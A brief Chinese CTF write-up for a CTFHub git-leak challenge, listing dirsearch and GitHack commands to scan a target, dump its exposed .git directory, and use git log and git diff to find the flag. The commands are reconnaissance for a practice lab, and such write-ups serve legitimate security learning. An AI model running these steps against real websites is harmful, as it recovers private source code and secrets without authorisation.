WP——ctfhub中git泄露
题目如下:
1.标题提醒log(git目录下的过去日志),使用工具dirsearch(Windows本机)和githack(kali中),进入dirsearch目录下运行cmd,
https://github.com/BugScanTeam/GitHackGitHack下载地址,将压缩包拖进kali
python dirsearch -u <url> -e *
2023-12-02 14:49:40
python dirsearch -u <url> -e *
python GitHack.py URL/.git/
git log
看到有flaggit diff 5a15ae34d34986b5e8f 13d6b91a1f5b774c8c81e
拿到flag